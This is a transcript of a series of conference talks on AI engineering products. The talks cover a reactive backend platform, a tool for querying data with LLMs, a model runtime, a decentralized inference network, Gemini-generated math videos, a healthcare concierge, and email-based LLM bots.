Take a picture of that. Or just go to future.mozilla.org/builders. And, you know, Justine and I and a lot of Mozillians are here this week. If you have something you're working on or something you think we should know about or you want to collaborate with us, please find us, reach out, or reach out to me via email.
So thanks again. Thanks to Justine and the community for all their work on Llamafile. Thank you, Stephen. Thank you, Justine. Ladies and gentlemen, please welcome to the stage the CEO of Convex, Jamie Turner. Hi. So originally I had this very fancy title for this talk, Deterministic Workflow, and I don't know.
But what I really want to title it is we accidentally made an AI platform, and what are we going to do about it? Convex's true mission, my company, is to replace traditional backend engineering. All the kind of stuff that we do on backend engineering. Generative AI, by the way, thinks that fate limiting is one of those things.
It's kind of cool. Sounds ominous, but it is ominous, right? So we glue things to things, we convert stuff between different systems. We map data formats constantly. And a lot of times teams are spending a lot of their time, like half their time, on this stuff. It has nothing to do with your product.
Your users don't care, and they don't benefit. So we want to replace all this stuff with a high-level API, kind of functional interface that feels native to your application. Similar to something like Firebase or Parse before it. So if you were doing this in the 2020s, and it was a design exercise, what would you replace all that stuff with?
What would that API look like? Well, for us, we took heavy inspiration from React, and really more generally, the way that kind of all applications are starting to have this functional reactive data flow relationship to state. If you're not familiar with React, here's a little baby example. You can create a state variable.
It has the setter. And what React really empowers is it makes sure that whenever that state changes, all the places that depend on it are updated, re-rendered, refreshed. And so in this case, our app would have hi, Olivia, in all caps. The problem is this paradigm breaks down when the server gets involved.
The server doesn't play the game this way. You still have to poll the server. You have to invalidate caches. You have to invent your own push mechanisms. So Convex fixes that. So Convex has queries and mutations like other frameworks you may be familiar with. But in Convex's case, it pervasively tracks data flow and dependencies through the backend.
And so it extends the reactive paradigm into the backend. Queries are these universally subscribable entities that applications can get updates from as soon as updates are available. So you might say, what does this have to do with AI? So what it has to do with is that some of the reacting entities are actually server-side actions.
It's not just the application. This may be a kind of architecture you've thought through before or played with. So something like a note taker. You know, maybe you're doing automatic speech recognition. And then you summarize it. And you generate embeddings and find related notes or whatever. And along the way, these different checkpoints, the application sometimes needs to be brought in.
Show the summary. You know, show related notes, et cetera. But in practice, we find that apps are actually a lot more sophisticated than this. This is a developer named web dev Cody who's building an application on Convex. That kind of like generates a first project plan given a prompt.
So in this case, it's an app to track recipes. And when he hits create plan, he's running on Convex. This is sort of like, let's get a bunch of project names. Let's get first feature requests, color palettes, icon ideas. All of these, as you can imagine, are kind of concurrent chains that are running in the background.
And all of them kind of flow into the application as they have results. It ends up that Convex's combination of seamlessly syncing state between these backend steps and the application is incredibly useful for a lot of generative AI apps. And for that reason, post-ChatGPT boom, like 90-plus percent of projects on Convex are generative AI.
And a lot of generative AI startups. So here's what we're doing about it. So the first thing we did is we got a lot of feedback from developers that one of those steps was always, or quite often, vector indexing. So developers said: this is how you make a schema on Convex.
It's just TypeScript, type completions, all that good stuff. They said, well, you already allow us to add indexes to our fields like this. Could you allow us to add vector indexes? And so we said, sure. We rolled that out late last year and it's being used very broadly now by projects on Convex.
The second thing we just did, which we're just kind of announcing right now, is we started a Convex for Startups program. A discount program, kind of access to startup-only forums and events and stuff like that. And in the first batch, we just admitted tons and tons of generative AI companies.
So again, this is sort of like the most engaged, excited customers right now. And then very soon, we're releasing these kind of high-level components. We have this Convex components framework, which kind of encapsulates whole state machines in these building blocks so you can easily drop into your app to have your back-end encompass these sophisticated workflows that we've co-developed with customers very easily and rapidly.
So anyway, that's us. If you're building something cool in generative AI and you want to sort of ship with confidence and quickly, check us out at Convex.dev. Thank you. Thank you. I walked away with that. Okay. Ladies and gentlemen, please welcome to the stage the CEO of Hasura, Tanmai Gopal.
Hey, everybody. So nice to be here. All right. So let's see if we can get this going. Cool. I'd originally titled this talk, "Connect real-time data to your AI," et cetera, et cetera. But really, it's more existential, right? The AI overlords are coming for us. And to help them be good rulers, to help us, let's just give them the data they need so that, you know, they can do a good job, right?
Hopefully, this talk is going to be the simplest talk that you heard at this conference. If it's not, I'll go back to using GPT-4 for coding instead of Sonnet. But the real pain that I have as I work with LLMs is that they can write a Flappy Bird for me, with my face going up and down, in 30 seconds, but they can't talk to my data intelligently.
It's really stupid. If I want to connect it to my calendar, and I just want to say, how many one-on-ones did I have last week? What's a good number to have with my team given their roles? Help me stagger them better and plan it out. I want to connect it to my Salesforce and say, why is this deal with Acme stuck in stage three?
And I need it to do the right thing. I need it to figure out the things between stage two and stage three in my sales pipeline and tell me why that particular deal is blocked. I want to connect it to my tickets and my product data and say, is this ticket from an enterprise customer?
What's the name of their project? Can you tell me, like, what the status of that project is and what part of the product funnel this project is in? I went to Amazon today in the morning, and they have this Rufus thing. And I was like, okay, cool. Is this product?
I'm going to tell you what that product is in a second. But is this product available for one-day delivery at my Harrison Street address? Right? And it just doesn't. Like, what is this? Right? Like, it's right here. Just do it. And it doesn't work. And you all know why it doesn't work.
Right? There's, like, a death by a thousand cuts, and it's not secure. And I don't want to connect my calendar and make it into a GPT. Who even knows what the GPT is doing with this? Right? Like, it's scary. And it doesn't work. So we solved this with a pretty simple idea, which is that you take your live data and business logic, and you make that available as a tool to your LLM.
No shit. It's not surprising. Right? It's easy. Because -- and we did a bunch of things that makes it work really, really well. Right? Let's see if we have time for a quick live demo here. Let me see if I'm connected to the internet, which I am. All right.
I'm going to zoom this up. All right. So, I am Blockbuster, because, obviously, service businesses are the most important businesses now, and, like, movie streaming businesses are going to go nowhere in the AI world that is to come. And so, with my Blockbuster database and transactions and all of this stuff that I have going on, I want to ask my data a question and say, "Help me write an email to my top customer, thanking them for their patronage. Mention some recent movies they watched." Right?
Straightforward request. I have all this data. I just need it to do the right things and write the email for me. Right? And it works. And it works despite the fact that it's going to two or three different places and getting data from them. And it works pretty well.
It handles all kinds of situations. And I'm going to talk to you about three key ideas about how it works. And hopefully that's going to be useful to you as well. So, the first is this idea for unified query language. Whether you're talking to structured data or unstructured data or APIs, what if your LLM could talk to everything the same way?
Right? LLMs don't know what your API is. If you're a little honest with yourself, you probably don't know what your API does. Right? But LLMs know what SQL is. Right? Because when you say select star from x where id greater than 1, greater than has a semantic meaning that is embedded in the language.
That in your API, that URL param, who knows what it means? Is it greater than or equal to? Is it greater than but actually only works with Boolean? I don't know. Right? But it works with SQL. Because LLMs know what that SQL is. Right? So the first part of this is, let's just make everything one query language and deal with that.
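As a generic illustration of that "one query language" idea (not Hasura's actual product; the schema, tool name, and hard-coded SQL below are hypothetical), an LLM can be handed a single read-only SQL tool with a well-defined meaning:

```python
# A toy data store plus the single SQL tool an LLM would be allowed to call.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE rentals (id INTEGER PRIMARY KEY, customer_id INTEGER,
                          movie TEXT, rented_at TEXT);
    INSERT INTO customers VALUES (1, 'Ada'), (2, 'Grace');
    INSERT INTO rentals VALUES
        (1, 1, 'The Matrix', '2024-05-01'),
        (2, 1, 'Arrival',    '2024-05-20'),
        (3, 2, 'Alien',      '2024-04-11');
""")

SCHEMA_HINT = "customers(id, name); rentals(id, customer_id, movie, rented_at)"

def run_sql_tool(sql: str):
    """The one tool the LLM gets: read-only SQL, where operators like > mean what they say."""
    if not sql.lstrip().lower().startswith("select"):
        raise ValueError("read-only tool: SELECT statements only")
    return conn.execute(sql).fetchall()

# In a real system the SQL below would be produced by the LLM from the user's
# question plus SCHEMA_HINT; it is hard-coded here so the sketch runs on its own.
llm_generated_sql = """
    SELECT c.name, r.movie, r.rented_at
    FROM rentals r JOIN customers c ON c.id = r.customer_id
    WHERE r.rented_at > '2024-05-01'
    ORDER BY r.rented_at DESC
"""
print(run_sql_tool(llm_generated_sql))
```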
The second is an object model for authorization. Right? Which is, again, kind of blows my mind of why it's so complicated. Look, I don't care where the data is coming from. The data has a schema. Right? It's a property of the data and it's a property of the session.
And then just run the rule. And maybe there's a hundred rules, but it should just work. And then however it gets accessed, it's fine. Right? I should be able to use this wherever it's used, however it's accessed, the same authorization should be applied. So that's idea number two. And that's kind of embedded there as well.
The third, and this is kind of interesting, is to get the LLM to figure out the plan to access data by itself. We don't have to hard code it and we don't have to do the work. And then you're like, Tanmay, listen, what are you smoking, man? LLMs can't even reason.
I can't even get it to count the number of r's in strawberry. What are you going to do? How are you going to make it fetch all of this data from three or four different places and disambiguate and whatnot? And we're like, you know what, there's a really simple fix to this problem.
But let me ask you a live question. How many of you can count the number of i's in supercalifragilisticexpialidocious? Can you? You can't, right? You're being mean to the LLM by asking it such questions. Don't be mean to the LLM. Set it up for success. Ask it to write Python code to solve the problem, and it works.
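The kind of tiny program you would ask the model to write instead of making it count in its head, for example:

```python
# Counting letters is trivial for code, even when it trips up an LLM.
word = "supercalifragilisticexpialidocious"
print(word.count("i"))  # -> 7
```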
And that's it. So when you're asking, and when we're asking our LLMs to figure out how to retrieve data, we just ask it to run Python code to fetch the data we want. So if the AI singularity is coming, get ready for the data singularity, put everything together. If you're doing AI, you need access to data.
If you're doing data, you wish that it could talk to your AI. If you have AI and data, and you need them to talk to each other, come visit us at our booth. Everything's in the open at Hasura. Talk to you folks soon. Thank you for your time.
Ladies and gentlemen, please welcome to the stage the CEO of Hypermode, Kevin Van Gundy. Before Hypermode, I worked at Vercel. We had an office down the street above a pizzeria, and we had three big problems. One, we were losing to other JavaScript frameworks. Two, we were losing badly to other hosting providers.
And three, I was losing to my diet of exclusively pepperoni pizza. Eventually, we started to win, not because we were smart, or we knew all the right answers, but because we built this core competency of iterating really, really, really quickly. We didn't know the optimum strategy, but we figured if we just tried more things faster than everyone else, we'd eventually be able to adapt and figure out the right products and strategies to figure out what the market wanted.
Iteration is the compound interest of software. Keep doing it long enough, and eventually, really good stuff starts to happen. Because we tried a lot of things really quickly, we eventually figured out two things. One, developers want to incrementally adopt new technologies. And two, they don't want to commit to architectural patterns before they know how their application is actually going to work.
But iteration can't happen if you're afraid of getting it wrong. The same thing that has held back the web is also holding back AI. And if I'm honest, there are even more things for us to get wrong about Gen AI. When I think about it, I'm grossly overwhelmed. What's the right hardware?
What's the right model? What's the right prompt? How do I integrate? How do I monitor? How do I improve? Everyone here knows a horror story of someone with a runaway bill, a hallucinating chatbot, a project that took months and months and never delivered any value. And in the end, we need to build systems that de-risk getting it wrong.
Because we are going to get it wrong a lot. Picking the wrong model doesn't matter if there's no friction to switching it out. Integration is simple when your classical systems and your AI systems use the same APIs. You can fearlessly make changes to prompt strategies, data mixes, if you can trace that inference step by step by step.
At Hypermode, we care deeply about making AI approachable. Everyone here should be able to put AI in their apps without specialized skills. At its core, Hypermode is a runtime. It allows you to easily integrate models and data into AI functions. We then surround that runtime with a bunch of tools that make it easy for you to rapidly iterate and observe those AI functions in prod.
We make it easy to get started, incrementally adopt AI as appropriate, and then, as your team develops those skills, reimagine those applications as AI-native. First and foremost, we want to make the developer experience of developing with AI a lot less terrible. When it comes to adding a new model to your service, you probably don't want to read a bunch of pages of docs to figure out whether the temperature is on a 0-to-2 scale rather than a 0-to-1 or a 1-to-10.
With Hypermode, we provide you type-ahead in your favorite code editor right out of the box. No SDKs, nothing to download. Then when you do ship to prod, we give you strong defaults just to get started. Or if you have your own stack, bring it along. In either case, we'll remove a lot of that complexity for you.
For example, traditional RAG requires N+1 requests. You need to make an additional call to embed the inputs, go talk to your vector store. With hypermode, you can do that all in one request. We've built an in-memory embedding and search service that will allow you to do that and save a couple hundred milliseconds per request.
Finally, building intuition around non-deterministic systems is hard. Each model has its own personality, and we make it really easy for you to quickly compare different inferences, different tunes, different models. And you can then export this data set to fine tune. On Monday, your boss is going to ask you, what did you learn at AI World Fair?
If you come by our workshop after lunch, I'll prove to you that you can make AI-- Ah, sorry. I'll prove to you that you can make iteration velocity a core competency. The team that built all this amazing stuff will be there. We'll show you how to build natural language search, intelligently sort every data list in your product, detect outliers, catch bad guys.
You'll walk away with a demo that you're proud of and a plan to put something like it in prod by the end of next month. And if seeing my happy face again and building something really cool is not enough, we'll give you $1,000 in Hypermode credits to get started. Thank you all so much.
Ladies and gentlemen, please welcome to the stage, VP of AI R&D at Hyperspace, Nicholas Schlapper. Hello, everybody. My name is Nicholas Schlapper. I'm an AI engineer. I think I'm at the right place. Today, I'm going to be announcing a new product we've been working on at Hyperspace. A little bit about us.
We are a decentralized AI network. We have no GPUs. We're building a community who take the resources from their personal computers and contribute to our decentralized network. We have a product currently out called AIOS. You can download it for Windows and Mac. It uses llama.cpp and does inference.
So technically, you can download it, get inference from somebody in Belgium, and you can have a chat experience like that. So we're hoping to -- oh, actually, sorry. We really believe in diverse models. We think not having just one big closed-source model is the answer for the best AI experience.
Having a mixture of a bunch of great experts will provide the best AI experience. So that gets us to our self-titled product, Hyperspace, which will be built on our network. This is a really interesting product. It's a mix of prompt engineering, visual React flow, Python execution, and RAG-like web browsing.
So for the first thing with this product, we wanted to build a fine-tuned model that outputted agentic planning experiences. So you put in a query, you get in a DAG -- or you get out a DAG in a JSON format. And this is a methodical plan from that query.
We also wanted to have a primitive of having an in-house web scraping experience for LLMs. So we're using Puppeteer and Beautiful Soup to scrape websites, convert that HTML into a markdown, something easier to read for LLMs, to digest. Kind of the product we're going to talk about is we have a node editor in a terminal, and this is going to be a power tool for the power users.
This node editor will allow you to change each node in the React flow to fit your needs. And this is coming from the DAG orchestration model we have. Here's a little video demo of our product. I recorded it yesterday in the hotel, so I'm sorry for the audio. And here we go.
Welcome to a very early look at Hyperspace. Let's begin with a sample query. Once you submit your query, you're brought into our node editor view, where each node is streamed in from our DAG orchestration model, HyperEngine V3. We want to emphasize that the user is still in full control.
They can edit the title, task description, and expected output. They also have the freedom to add as many nodes as they like. Let's execute. Now that our outputs are done, we can talk a little bit about the outputs. Each output is coming from each node, and each node is creating a query based on that task.
It's combining the overall goal, the local goal, and whatever's happened in the previous node. We're using a reasoning model and a summarization model. For reasoning, we're using Qwen2 Instruct, and then for summarization, we're using Llama 3 70B. This helps provide a diverse set of synthesized answers. For the outputs that do have Python, we can go ahead and run them and see them in our terminal.
The terminal will automatically open up with the output. We want to provide the groundwork for agentic behavior in the future by providing these core primitives. Over here on our right, we have our virtual file system that changes our directory. We're trying to build out all the primitives to what an agent would need, memory, Python execution, planning, and code generation.
Thank you so much for watching. We're very excited to get this out in the coming weeks. Happy to announce that it will be available later this week via wait list. So go ahead and pay attention to our Twitter. Hyperspace AI. All right. Thank you. That's my time. Ladies and gentlemen, please welcome back to the stage your host and co-founder of the AI Engineer Summit.
Benjamin Dunphy. Benjamin Dunphy. All right. How are we feeling? Was that a good keynote opener? Are you guys awake yet? All right. Can we have a round of applause for opening keynote speakers, please? What a way to kick off the day. We are now heading into the breakout portion of the day.
So let's review all the tracks that we're featuring today. So AI is not just for startups with nothing to lose. It is being adopted at scale and at speed in the largest household names in the world. Beyang is CTO of Sourcegraph, which has been building enterprise-scale developer tools for over a decade.
And is now building Cody, which he is a co-founder of, and his CEO is also presenting in the CodeGen track. But for the AI in Fortune 500 track, come join Beyang and his speakers in Golden Gate B, just up the escalators. Next, we have RAG, which is the workhorse of AI engineering.
And there is a lot of detail to get right from vector databases to re-ranking. Freddie was a machine learning engineer at GitHub and is now CTO and co-founder of Quotient AI, which helps with rapid RAG development through evals. Join him in salons 2 through 6 outside the doors behind you and to the left starting at 11:15.
CodeGen and DevTools. The productivity boost of Software 3.0 derives mostly from combining Software 1.0, code, and Software 2.0, models. As engineers, we are best at accelerating ourselves. Brittany spoke at the AI Engineer Summit last October and is one of the DevTools investors at CRV. We'll be putting up an air wall to split this room in just a bit.
So, attend those sessions right here in Salon 7 starting at 11:15. Frontier models are sexy, but open models are the ones you can take home and make your own. Greg is CEO of Oxen.ai, where among many responsibilities, he runs the arXiv deep-dive paper clubs that cover many of the open models and fine-tuning techniques this track offers.
Join him right here in Salon 8 after the break. Last but not least, the AI leadership track addresses the growing needs in leading teams of AI engineers. From platform engineering, to eval frameworks, to GPU cost optimization, and case studies from weights and biases, to Khan Academy, to Neo4j, to OpenAI.
You may be familiar with Peter from his newsletters like Ruby Weekly and JavaScript Weekly, but perhaps more relevant to today, he has emceed O'Reilly's Fluent Conf in this very hotel. Note that this is a track exclusive to folks with green lanyards and green badges. If there is room, at session start time, we can let in blue badge and blue lanyards, basically speakers.
Anyone else, please do not attempt to attend these closed door sessions, or you may be escorted from the premises. These are exclusive sessions. They paid for this. Please do not make us remove you from the building. These take place right across the hall in Nob Hill, B2D. So we'll take a short break, head to the expo sessions, which are taking place right over there, salons 10 through 15.
Head to the expo, meet with our sponsors, get some demos, and the breakout sessions will start promptly at 11:15. All right. Let's get to it, everyone. Bye. Bye. *music* Hey, everyone. I'm Aditya Advani, an AI engineer based in San Francisco. Along with my teammates, I created Math Matrix Movies at a hackathon in SF on May 11th, 2024.
Today, I'd like to show you what our project can do because I think it's really cool. What it does is that it generates really cool math explainer videos in a truly unique style that is able to get concepts across visually. This is something that I think is really unique that you may never have seen before.
So AI hackers, let's start with a live demo. In our demo, I decided that perhaps we should talk about probability. This year, only 10% of the applicants for speakers at this AI Engineer World's Fair were accepted to speak on stage. I didn't make the cut, which is why you're watching me on this recording.
Now there's no hard feelings, but I'm ambitious and so I want to try again for next year and the year after that. So let's assume that next year the acceptance rate for talks falls to 7%. Do my odds of getting in increase or decrease now that I didn't get in?
Also, if the year after that the acceptance rate is just 5%, what are my odds of getting in in at least one of the two years? Now watch, I'm going to enter that as a prompt into Math Matrix Movies. It's going to take that whole math problem and it's going to generate a great math explainer to explain the whole situation right back to us.
And at the end of this video, you're going to see what it's done. In the meanwhile, while that prompt is put in and it generates, let me show you a clip from one of our already published videos on sigmoid functions. Watch now how the math video explains how the shape of a sigmoid curve changes based on the equation used to draw it.
Check it out. Now, let's look at the math. Don't be scared, it's simpler than it looks. This is the formula for a sigmoid. It uses E, a special number like pi, and X can be anything we want. If we change the X part of the formula, we can move the curve around.
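The formula being narrated is presumably the standard logistic (sigmoid) function; a tiny sketch of it, and of the shift that comes up next:

```python
# The standard logistic (sigmoid) curve; shifting x moves the curve left or
# right while the S shape stays the same.
import math

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

print(round(sigmoid(0), 3))      # 0.5: the midpoint of the curve sits at x = 0
print(round(sigmoid(0 - 2), 3))  # ~0.119: with the "-2", the midpoint moves to x = 2
```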
Here, we added a -2 and look, the curve shifted. We can do lots of cool things by changing this formula, but the S shape always stays the same. Crazy, right? So how does that work? Well, we have to thank the math educator genius, Grant Sanderson, a.k.a. 3Blue1Brown. Because he created all his amazing math videos by writing his very own math animation library in Python, and it's called Manim.
Under the hood, Manim uses a 2D graphics library called Cairo to generate most of the drawings and the animations. And then it uses the very powerful command line tool FFmpeg to combine those animations as well as voiceovers and other elements such as LaTeX equations into compelling math videos. So here, in this case, you can check out the code for a simple movie where we try to animate 5 plus 3 equals 8 for six-year-olds, by using two groups, five red apples and then three green apples, and then combining them into one row of eight apples.
So let's see how Manim actually does this. So it's a simple block of Python code. For each section, there's a voiceover, which is created by Azure TTS, and within that scene, we actually are able to lay out the elements and, you know, enumerate them using an array and animate them and move them around, all in one block of Python code.
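Roughly what such a narrated scene looks like, based on the manim and manim-voiceover packages; the Azure voice name and exact options are assumptions, so check those projects' docs before running this:

```python
# A sketch of a narrated Manim scene in the spirit of the 5 + 3 = 8 example.
from manim import Circle, VGroup, FadeIn, RED, GREEN
from manim_voiceover import VoiceoverScene
from manim_voiceover.services.azure import AzureService

class FivePlusThree(VoiceoverScene):
    def construct(self):
        # Azure TTS drives the narration; the voice name is an assumption.
        self.set_speech_service(AzureService(voice="en-US-AriaNeural"))

        red_apples = VGroup(*[Circle(radius=0.3, color=RED, fill_opacity=1)
                              for _ in range(5)]).arrange(buff=0.2)
        green_apples = VGroup(*[Circle(radius=0.3, color=GREEN, fill_opacity=1)
                                for _ in range(3)]).arrange(buff=0.2)
        green_apples.next_to(red_apples, buff=0.6)

        with self.voiceover(text="Here are five red apples.") as tracker:
            self.play(FadeIn(red_apples), run_time=tracker.duration)

        with self.voiceover(text="And here are three green apples.") as tracker:
            self.play(FadeIn(green_apples), run_time=tracker.duration)

        with self.voiceover(text="Together, that makes eight apples!") as tracker:
            everything = VGroup(red_apples, green_apples)
            self.play(everything.animate.arrange(buff=0.2).center(),
                      run_time=tracker.duration)
```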
So this one or one and a half minute movie that explains five plus three equals eight to six year olds is just maybe 30 lines of Python. And what we do in our project is we use Google's Gemini to actually generate this code. So if many of you are like me, you struggle with visualizing and contextualizing the math and algorithms behind the river of information flowing at us as AI engineers every day.
I often find myself wondering about something I read in the Latent Space podcast or saw on Twitter or talked about with a colleague. But I lack the right words or formulas to make my intuition explicable and testable. And here, Math Matrix Movies is like a godsend.
It's like you gave Google's Gemini a whiteboard and said, teach me at my level. In our user testing, we've given it to a seven-year-old kid and watched them generate movies over and over in different variations. Explain 22 times 22 to me with apples, with fish, with TVs.
So it's pretty crazy. It's an education hack that opens up a vista into how AI tutoring can enable accelerated learning of concepts. So now, let's take a look at the output of that prompt that we put in earlier. This is a slightly different version of the prompt. I just did it again because I lost that page.
So it's taken the prompt and it's created a video. It actually creates the video and then it watches the video again and improves it, checking it for overlaps and occlusions. Gemini's vision is good, but it's not great. It has a lot of gotchas. But let me show you what the final output is like and, you know, with a few more iterations, it would get even better.
And as it is, this is pretty good. I'm going to increase the speed so that it goes pretty quick. Here's our final video for now. Rejected from AI engineers world's fair, sad face. But what about next year and the year after that? Let's assume the acceptance rate for talks falls to 7% next year.
Let's visualize this. Each square represents an applicant and there are 100 applicants in total. The green squares show the 7 applicants that get accepted. The year after, let's assume that the acceptance rate falls to 5%. Again, each square here represents an applicant and we still have 100 applicants. This time, only 5 applicants, shown in green, will be selected.
Now, let's calculate the probability of getting my talk accepted in at least one of the next two years. The probability of not getting accepted in year 1 is 1 minus the 7% probability of getting accepted, which is 93%. Similarly, the probability of not getting accepted in year 2 is 95%. The probability of not getting accepted in either year is the product of the two probabilities we just calculated, which comes out to 88.35%.
Finally, the probability of getting accepted at least once is 1 minus the probability of not getting in either year. That gives us a decent 11.65% chance. So, there's still a chance. Yep. See you on the stage. Brought to you by the power of probability. So, keep applying, keep learning, and who knows, you might just see me on stage next year.
Yep. Sure hope so. Hint, hint. Rejected from AI engineer. Cool. Well, I hope you guys enjoyed that. I'd like to thank Baladharikesh, Lily, and Justin for bringing this project to life with me. Thank you for your attention, and please check out our videos on YouTube and fill out your math video requests at math.auto.movie.
Thank you so much. Hello. Welcome, everyone. In this brief presentation, we will talk about how we are building an AI-powered healthcare concierge, and share some key tips and tricks that we learned while building the service. So, if you're interested in healthcare and AI, this is the right session for you.
To quickly introduce myself, my name is Akhilesh Gupta. I'm the co-founder of Harness Care, and I've been in product and tech roles for the last 15-plus years. At Harness Care, our mission is simple. We started the company with the goal of empowering everyone to navigate the healthcare system with ease.
To really help reduce some of those barriers that people face while accessing care at the right time and at affordable prices. Now, we all know how complex the US healthcare system is, but to highlight a few points, there are roughly 100 million people who are in medical debt in the US.
There are 55 million people who have some family caregiver responsibilities, but most of them find it difficult to manage the caregiving plus the work responsibilities they have. And most of us do not have sufficient healthcare literacy to really navigate the system or advocate for ourselves against the providers or insurance policies.
Now, many of those issues really prevent people from getting care, or delay it, but what if we had a personalized expert in a concierge form to really reduce this burden and take care of various mundane tasks for care coordination? This can be as simple as getting quick answers regarding my benefits. This could be asking the concierge to find an available provider and the price estimates for the services.
Or this could be managing my out-of-network bills and filing the claims with insurance automatically. These are just a few examples of how this concierge can help improve the care journey for the patients and the caregivers. Now, this vision would have been impossible a few years ago, but luckily, with the regulatory and technology tailwinds, a lot of this is now possible.
The first is really the regulatory tailwinds in the form of improving data interoperability, whereby providers and insurance plans are required to make personal health records easily accessible and pricing data available. Now, there is also a slew of healthcare data aggregation platforms, which are using these standards and making data access cheaper and easier for many of the health tech startups.
And lastly, our heroes, the large language models, which can really generate insights from a mountain of this health data in unstructured and structured forms and perform tasks using agents. The way we make this all work together right now includes three different components. One is the data aggregation and standardization.
So once we extract data from various different platforms, whether it's medical records, insurance plans, claims, or other data sources, we then normalize it, using LLMs to extract critical information from unstructured data, standardize it for our data stores, and make it available to our AI concierge service. On top of that, the second big area is enriching our AI concierge with public knowledge bases.
These can be curated sources of information for medical terminologies, clinical resources to provide better guidance to the patients. And lastly, integrate with third party vendors to really perform common tasks, whether it's medication orders, looking at pricing records, scheduling appointments, or looking at financial assistance programs. And all this becomes available to the user through our AI concierge platform.
Now, there have been some critical, interesting learnings for us during this journey. The first one has been around rephrasing user prompts. We all know the quality of responses from LLMs really depends upon the quality of the prompts. But users don't often ask the detailed questions or may have typos for the prompts they are making.
Using LLMs, we can rephrase their questions and clarify the intent. For example, in this case, if a user says, "Is ER included?", we can rephrase that using an LLM to clarify that the question the user is asking is, "Is emergency room coverage included in my insurance plan?" That significantly improves the quality of RAG and also the LLM responses.
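A generic sketch of that rephrasing step (not Harness Care's actual code; the model choice and prompt wording are assumptions):

```python
# Rewrite a terse user message into a fully specified question before retrieval.
from openai import OpenAI

client = OpenAI()  # assumes OPENAI_API_KEY is set; any chat model would do

def rephrase_query(raw_query: str, context: str) -> str:
    resp = client.chat.completions.create(
        model="gpt-4o-mini",
        messages=[
            {"role": "system",
             "content": "Rewrite the user's message as one clear, fully specified "
                        "question, fixing typos and expanding abbreviations. "
                        f"Context about the user: {context}"},
            {"role": "user", "content": raw_query},
        ],
    )
    return resp.choices[0].message.content.strip()

print(rephrase_query("is ER included",
                     "The user is asking about their health insurance plan."))
# Expected output along the lines of:
# "Is emergency room coverage included in my health insurance plan?"
```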
The second key learning we had was around preprocessing of documents to improve RAG. Large documents obviously take a lot more tokens and don't always work well during the vector lookups. What we do instead is create structured summaries out of these large documents, depending upon whether it's a clinical document or an insurance policy document.
We create different summaries accordingly and that significantly improves the RAG accuracy for us while reducing the token usage as well. And lastly, the user experience. Users don't always know how to best use the AI tools. We do need to educate them with contextual suggestions. For example, in our case, we could recommend them different prompts when they're looking at medical records.
This could be if they want to look up side effects for their medications or diagnosis details, etc. But when they're looking at the coverage policy, we can show them guided prompts around coverage details. For example, for mental health services, ER visits, etc., the common issues people face. Or when they're looking at insurance claims, we suggest them different kinds of prompts to help them be more educated about the services and the use cases.
This definitely improves the overall engagement with the AI and the user satisfaction as well. We are always looking for passionate engineers to work on these problems with us. So if you're interested in what we are building or just want to brainstorm a few ideas, feel free to reach out to us.
Thank you so much. When ChatGPT first came out, GPT-3 had been available for two and a half years via an API. ChatGPT didn't blow up because of a new AI, but because of a new interface. And today if you look at the GPT wrappers that have gotten traction, they've either differentiated on interface or they brought the interaction closer to where the user already lives and works.
Cursor is my favorite example of this. I used to use ChatGPT to answer a lot of code questions, but I find it so much more valuable to have that LLM right there in my IDE. We've over-indexed a bit on Chat as the de facto interface for AI, and it's unquestionably proved useful in a lot of situations.
But I think there's still a lot of opportunity to experiment with different interfaces for different people and different use cases. And I think most folks are sleeping on email as an interface for LLM-based apps. My name is Greg Boggess, I'm the founder of HiHi Labs, and I've spent the last year building and experimenting with a whole bunch of email bots.
In the rest of this video, I want to first talk about why you might want to consider email as your interface. And two, I want to talk about how you can build your own email bot and some technical considerations you'll encounter along the way. And hopefully I can save you a little time by sharing some of the lessons that I've learned.
First, so why email? Email is ubiquitous and cross-platform. Back when I served on the developer relations team at Twilio, we used to say SMS is the only app that comes pre-installed on every phone. But it's true of email as well, which is why Twilio eventually spent $3 billion to buy SendGrid.
Email is frictionless. I partnered with someone who works for a non-profit supporting public school principals. And we built this email bot that took classroom observation notes and helped principals write a first draft of a teacher evaluation that fit the Danielson framework. We started to get some traction and we said, okay, hey, would you like this as a web app?
And many of them said, no. I actually, I already have so many web tools that I have to sign into. Some of those apps work better on some machines than others. Sometimes there are restrictions on what websites we can and can't visit from within the school. But I can always send an email.
And also we found out that one way principals were finding out about the service was that their peers were forwarding them the results. Emails are easy to share. And because of this, email and email apps have a long history of going viral. One of the first apps I ever built, you can actually try it out if you want.
You can email start@adventuresinemail.com. And the basic idea here was like a choose your own adventure style interactive fiction that was bespoke that you could play with your friends by CCing them. I sent it off to my parents. I was like, hey, create a story about Hawaii. It's my parents' favorite place.
And I kind of went to bed. I figured I'd like see a couple of emails and I'd reply back in the morning. I woke up to 76 emails. And they had played so much that eventually the app crashed because I was hitting the token limit. And I don't think that they're ever really going to go to the GPT store and spend a lot of time on there.
But they're in their inboxes every day. Email meets people where they already are. So how do you build an email bot? First, you're going to need a service that offers programmatic email. There's a bunch of these. I personally have been really enjoying Postmark. It's just a great, clean developer experience.
You're going to set up a few DNS entries. You're going to point your domain's inbound email to Postmark. Then Postmark will make an HTTP request to your app. I've used FastAPI for a lot of my apps. Super easy to set up an endpoint to receive that inbound request.
And the data about your email will just be stored in JSON. Then you're going to want some sort of background job like Celery because these generations take time. Which actually is a cool bit about email. It's async. So the user doesn't expect an immediate response. Email is actually a pretty good medium for more agentic processes.
Or you can actually just take advantage of that to use, say, batch processing and save a lot of money in your generations. You can even put a human in the loop. But however you do it, you're going to want some sort of background job that's going to do the processing.
That's going to create the generation. And then you'll use the API to send off your reply. These emails are considered transactional emails, not broadcast emails. So your deliverability rates are probably going to be a lot higher. Now, how do you structure your LLM? I think there's two things you've got to do here.
On your system message, it helps a lot to tell your LLM, hey, this is a conversation being conducted over email. I like to tell it to reply in plain text. And then if I want an HTML formatted email, I run that through a separate generation. The user message, I like to feed in some bits about the email in JSON.
The LLM does a really good job of interpreting that JSON and then spitting back just plain text for me. It is important to pass in the subject because a lot of users will just include important context about the message or the entirety of the message itself in the subject.
But of course, when you reply, you're just going to want to use the same subject so that you can take advantage of threading in the inbox. Speaking of threading, there's a couple of things you're going to want to do. One is to keep the subject the same. And the second is you want to set a References header referencing the original Message-ID.
